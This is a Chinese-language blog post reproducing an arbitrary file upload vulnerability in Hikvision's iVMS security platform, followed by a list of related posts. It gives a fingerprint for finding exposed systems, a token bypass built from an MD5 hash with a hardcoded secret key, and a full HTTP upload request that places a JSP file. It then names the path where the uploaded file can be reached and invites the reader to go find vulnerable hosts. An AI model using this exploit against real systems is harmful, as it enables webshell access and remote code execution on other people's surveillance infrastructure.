漏洞概述

简介:海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations/upload接口任意上传文件,导致获取服务器webshell权限,同时可远程进行恶意代码执行。

hunter指纹

web.icon==“3670cbb1369332b296ce44a94b7dd685”

漏洞复现

漏洞url:/eps/api/resourceOperations/upload
检测脚本PoC:https://github.com/sccmdaveli/hikvision-poc

可以看到需要token,这俩token需要用url+secretkey的md5值进行绕过

http://url/eps/api/resourceOperations/uploadsecretKeyIbuilding

进行上传

POST /eps/api/resourceOperations/upload?token=Token值 HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: /
Connection: close
Cookie: ISMS_8700_Sessionname=ABCB193BD9D82CC2D6094F6ED4D81169
Content-Length: 179
Content-Type: multipart/form-data; boundary=f7d1250b2d43db9324c19e1073573ce6

–f7d1250b2d43db9324c19e1073573ce6
Content-Disposition: form-data; name=“fileUploader”; filename=“1.jsp”
Content-Type: image/jpeg

test
–f7d1250b2d43db9324c19e1073573ce6–

访问路径http://url/eps/upload/uid.jsp

然后就可以愉快的刷洞了


更为详细链接为:https://blog.csdn.net/qq_41904294/article/details/130807691

海康威视iVMS系统在野 0day漏洞复现相关推荐

  1. 【漏洞复现】海康威视iVMS综合安防系统任意文件上传漏洞复现 (在野0day)

    文章目录 前言 声明 一.产品简介 二.漏洞概述 三.影响范围 四.漏洞验证 五.漏洞利用 六.修复建议 前言 海康威视iVMS综合安防系统存在任意文件上传漏洞 ,攻击者可通过构造特定Payload实 ...

  2. 海康威视iVMS综合安防系统任意文件上传漏洞复现(0day)

    0x01 产品简介 海康威视iVMS集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控.联网报警.智能分析.运维管理等多种安全防范应用系统,构建的多业务应用综合管 ...

  3. 海康威视iVMS综合安防系统任意文件上传漏洞复现 (0day)

    前言 此文章仅用于技术交流,严禁用于对外发起恶意攻击!!! 一.漏洞描述 海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations ...

  4. 赶紧更新!PC版微信被曝高危0day漏洞;特斯拉Autopilot源码窃取案尘埃落定

    特斯拉Autopilot源码窃取案尘埃落定:撤诉和解.前雇员道歉赔偿 特斯拉刚刚结束了与一名前雇员就Autopilot源代码的诉讼.特斯拉在2019年起诉了前员工曹光植,称其在加入小鹏汽车之前就窃取了 ...

  5. 泛微e-cology9 SQL注入漏洞复现(QVD-2023-5012)

    1.产品简介 泛微协同管理应用平台e-cology是一套兼具企业信息门户.知识文档管理.工作流程管理.人力资源管理.客户关系管理.项目管理.财务管理.资产管理.供应链管理.数据中心功能的企业大型协同管 ...

  6. Goby 漏洞更新 |海康威视部分iVMS系统存在文件上传漏洞

    漏洞名称:海康威视部分iVMS系统存在文件上传漏洞 English Name:Some Hikvision iVMS file upload vulnerabilitie CVSS core: 9.8 ...

  7. Windows系统帮助中心程序的0day漏洞

    金山网盾监测到一个新的0day漏洞,这是一个基于Windows系统帮助中心程序的0day漏洞,它是由于帮助中心程序进行格式处理时调用hcp协议的一个错误引起的.***者利用这个漏洞可以在用户的电脑上执 ...

  8. [系统安全] 九.Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御

    您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...

  9. 安卓修复已遭在野利用的内核 0day 漏洞

     聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 谷歌安卓在2021年11月安全更新共修复了39个漏洞,其中18个位于框架和系统组件中,18个位于内核和供应商组件中. 安卓安全更新修复了一个0d ...

最新文章

  1. lucene索引合并与增量索引
  2. 道康宁有机硅助力动力电池发展
  3. jni c 回调 java,JNI - 如何从C ++或C回调到Java?
  4. 【Flink】Flink kafka producer 分区策略 (flink写入数据不均匀 与 数据写入 分区无数据 )
  5. 基于51单片机病床呼叫系统proteus仿真设计(protues仿真+源码+报告)
  6. macos蓝牙驱动和wifi驱动名称_win7蓝牙装不上?别急着捣鼓驱动软件啦!可能是硬件问题!...
  7. IntelliJ IDEA常用快捷键
  8. python主函数_Python main() 函数
  9. Halcon测量圆直径(半径)的方法之暴力拟合法 vs 测量工具法
  10. oblog后台管理问题
  11. 批发记账本软件隐私政策
  12. SQL题目练习---三表联查
  13. sparksql:dataframe数据写入到Hbase中
  14. 中兴盒子B860AV1.1-T2版刷公版固件教程
  15. 倒计时!「一起学」大会线下分享与社群内部直播!
  16. 详解什么是软件企业认定
  17. 基于photoswipe实现的vue图片预览组件vue-image-swipe
  18. Easy3D开发——点云孔洞填充
  19. 矩阵分析L6矩阵函数
  20. 2021年低压电工模拟考试题及低压电工复审模拟考试

热门文章

  1. 数据分析见解-数据异常波动
  2. 驶入脱贫“高速路”-国稻种芯-通榆县:稻谷农特产品推送进城
  3. 继量子网络,荷兰为抢量子计算生态系统又投钱了
  4. 尤里的复仇Ⅰ 小芳!
  5. iphone分辨率图解
  6. python beautifulsoup下载_使用Python和BeautifulSoup从网页下载.xls文件
  7. touchdesigner leapmotion传感器案例
  8. 2021浙江温岭高考成绩查询,台州2021高考成绩排名榜单,台州各高中高考成绩喜报...
  9. 解决ORA-01940无法删除当前已连接用户
  10. Not all slots covered! Only 10922 slots are available